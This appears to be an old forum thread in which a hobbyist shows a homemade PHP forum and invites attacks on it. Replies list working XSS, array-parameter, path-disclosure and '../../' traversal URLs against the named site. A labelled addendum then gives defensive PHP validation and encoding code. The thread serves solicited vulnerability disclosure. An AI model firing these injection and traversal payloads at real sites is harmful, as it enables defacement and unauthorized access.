
My Forum - From Scratch



Ok, so I've been making my own forum from scratch in PHP. I've posted it lots of other places, but I thought it was time to post it here.

Note: forum is being rewritten because of people hacking

Note2: You cannot login/register now as I am making the security on those better, but you can still post, etc.

Hackers: Try your hardest to hack this please, and tell me if you do and how you did it.


Now to the post.

*Click Here For Beta Forum*

Forum still being rewritten but you can still check out beta!


___Features___

- Post
- Categories
- Create Topic
- Log in
- Register
- User List
- ACP (Admin Control Panel)
- User Panel
- 5 Smiley's
- BB Code
- Avatars
- Sigy's
- Nice looking clickable smiley List

 

___Features To Come___

- PM's - 50%
- MySql transition (switching from files to MySql) - 1%
- Need Suggestions!

 

Some wip features may be on forum for testing.

 

Please give criticism!

 

Feature suggestions Please!

 

History

12/7/7 - Released

12/7/7 - Added topic creation

12/7/7 - Added log in

12/7/7 - Fix some small bugs

12/7/7 - Added User List

12/7/7 - Added ACP

12/7/7 - Added User Panel

12/7/7 - Added smiley

12/7/7 - Added code

12/7/7 - Added Auto Line Break

12/7/7 - Added avatar function

12/7/7 - Made posts more neat

12/7/7 - Added more codes

12/7/7 - Fixed minor glitch

13/7/7 - Fixed major error

13/7/7 - Added sigy's

13/7/7 - Added demo account

13/7/7 - Added grafix

16/7/7 - Added Clickable smiley list

16/7/7 - Made the clickable smiley list look better


Please hack!


~MiniPort_Owner Aka: mini


Array:

http://blokdudez.110mb.com/forum/show_cat.php?cat[]

 

Array:

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP[]

 

Array:

http://blokdudez.110mb.com/topic.php?topic[]

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/do_post.php?path=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/make_topic.php?path='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/show_cat.php?cat=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://blokdudez.110mb.com/topic.php?topic=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if you post a topic that contains "code.

 

Full Path Disclosure:

http://blokdudez.110mb.com/forum/make_topic.php

Warning: copy(/Topic/index.htm) [function.copy]: failed to open stream: No such file or directory in /www/110mb.com/b/l/o/k/d/u/d/e/blokdudez/htdocs/forum/bin/make_topic.php on line 19

I registered the nick "<marquee>shit"

and it works...

 

http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=\%22%3E%3Cmarquee%3Eownd%20bitch

 

omfg tooo many xss/holes...

 

 

http://blokdudez.110mb.com/forum/make_topic.php?path=../../

path disclosure.

 

messages == xssable...

 

fix the holes then try again, and use DB instead of w/e you are currently doing.

 

http://blokdudez.110mb.com/forum/show_post.php?cat=../../

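Added example, not part of the thread or the forum's own code: one way to handle the `cat`, `TOP` and nickname inputs reported in the two replies above, covering array-valued parameters, reflected and stored markup, `../` in `cat`, and warnings printed into the page. The `CATEGORIES` allowlist, the topic-name character set and the helper names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example. CATEGORIES and the topic-name character set are assumptions.
ini_set('display_errors', '0');  // warnings go to the log, not into the page
ini_set('log_errors', '1');

const CATEGORIES = ['General', 'Help'];  // hypothetical allowlist

// Scalar string parameter, or null when missing, oversized, or sent as cat[].
function param_string(array $src, string $name, int $maxLen = 64): ?string
{
    $v = $src[$name] ?? null;
    return (is_string($v) && $v !== '' && strlen($v) <= $maxLen) ? $v : null;
}

// Exact allowlist match, so "../../" never reaches a filesystem call.
function valid_category(?string $cat): ?string
{
    return ($cat !== null && in_array($cat, CATEGORIES, true)) ? $cat : null;
}

// Topic names limited to a safe character set: no slashes, dots or markup.
function valid_topic(?string $topic): ?string
{
    $ok = $topic !== null && preg_match('/\A[A-Za-z0-9 _-]{1,64}\z/', $topic) === 1;
    return $ok ? $topic : null;
}

// Encode at output time for HTML text and quoted attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed requests mirroring the parameter shapes reported in the thread.
$samples = [
    ['cat' => 'General', 'TOP' => 'Welcome'],
    ['cat' => ['x'], 'TOP' => 'Welcome'],
    ['cat' => 'General', 'TOP' => '<marquee><h1>vulnerable</marquee>'],
    ['cat' => '../../', 'TOP' => 'Welcome'],
];
foreach ($samples as $get) {
    $cat = valid_category(param_string($get, 'cat'));
    $top = valid_topic(param_string($get, 'TOP'));
    echo ($cat === null || $top === null)
        ? "400 Bad Request\n"  // generic error that does not echo the input
        : '<h1>' . h($cat) . ' / ' . h($top) . "</h1>\n";
}
// Stored values (nicknames, post bodies) are kept raw and encoded when rendered.
echo '<span class="nick">' . h('<marquee>nick') . "</span>\n";
```

Validation rejects the malformed requests before any file access, and `h()` is still applied to accepted values so that output encoding does not depend on the validators being complete.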
